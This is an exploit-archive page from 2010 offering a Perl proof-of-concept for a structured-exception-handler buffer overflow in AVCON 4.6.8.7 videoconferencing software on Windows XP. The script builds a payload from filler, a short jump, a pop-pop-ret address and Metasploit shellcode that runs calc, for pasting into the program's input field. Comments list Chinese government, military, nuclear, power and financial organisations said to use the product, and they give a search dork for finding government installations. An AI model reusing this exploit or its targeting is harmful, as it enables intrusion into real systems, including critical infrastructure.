AVCON Buffer Overflow
Posted on 07 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>AVCON Buffer Overflow</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================== AVCON Buffer Overflow ===================== #!/usr/bin/perl # Exploit Title: AVCON Buffer Overflow # Date: 5/7/10 # Author: Dillon Beresford # URL: http://www.avcon.com.cn/ # Version: 4.6.8.7 # Tested on: XP SP2 and SP3 # CVE : NONE # Code : exploit.pl # Twitter: http://twitter.com/D1N # Dork: site:gov.cn "AVCON" # There are other bugs... This is just for fun ;-) # Paste the output from exploit.txt into AVH323GW.exe # Enjoy the wang chung++ and look for the other bugs. ;) # 2 products from China and 2 0days in one month dizam! # Okay so who uses AVCON4 and why is it so important? # China's State Grid # China's State Information Center # China's Customs armed police # China's Shenyang Military Region # China's Yunnan Frontier Corps # China's Nuclear Agencies # China Life Insurance Company # China Pacific Insurance Group # China National Petroleum Corporation # Daqing Oilfield Material Group # Grace Pai Henan Electric Power # China Civil Aviation Information Group # China Southern Airlines Co., Ltd. # Shenzhen International Trust # National Grain and Oil Information Center # Anyang City of Henan Province E # Guangdong Food and Drug Administration ## EDB Test Notes: ## Software can be installed as English. Once installed, go to "Start" -> "AVCON4" -> ## run "AVH323GW.exe", copy and paste the exploit (string) to the input field (there's only one), ## and click on "call". my $exploit = "poc.txt"; my $junk = "x41" x 1019; my $nSEH = "xebx06x90x90"; # jmp 6 bytes my $SEH = pack('V',0x200504B4); # pop pop ret # windows/exec - 218 bytes # http://www.metasploit.com # Encoder: x86/fnstenv_mov # EXITFUNC=seh, CMD=calc my $buf = "x6ax31x59xd9xeexd9x74x24xf4x5bx81x73x13xc4" . "xd2xe5x7bx83xebxfcxe2xf4x38x3ax6cx7bxc4xd2" . "x85xf2x21xe3x37x1fx4fx80xd5xf0x96xdex6ex29" . "xd0x59x97x53xcbx65xafx5dxf5x2dxd4xbbx68xee" . "x84x07xc6xfexc5xbax0bxdfxe4xbcx26x22xb7x2c" . "x4fx80xf5xf0x86xeexe4xabx4fx92x9dxfex04xa6" . "xafx7ax14x82x6ex33xdcx59xbdx5bxc5x01x06x47" . "x8dx59xd1xf0xc5x04xd4x84xf5x12x49xbax0bxdf" . "xe4xbcxfcx32x90x8fxc7xafx1dx40xb9xf6x90x99" . "x9cx59xbdx5fxc5x01x83xf0xc8x99x6ex23xd8xd3" . "x36xf0xc0x59xe4xabx4dx96xc1x5fx9fx89x84x22" . "x9ex83x1ax9bx9cx8dxbfxf0xd6x39x63x26xaexd3" . "x68xfex7dxd2xe5x7bx94xbaxd4xf0xabx55x1axae" . "x7fx2cxebx49x2exbax43xeex79x4fx1axaexf8xd4" . "x99x71x44x29x05x0exc1x69xa2x68xb6xbdx8fx7b" . "x97x2dx30x18xa5xbex86x7b"; my $padding = "x90" x 5000; # padding my $payload = $junk.$nSEH.$SEH.$buf.$padding; open (myfile,">$exploit"); print myfile $payload; close (myfile); # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-07]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
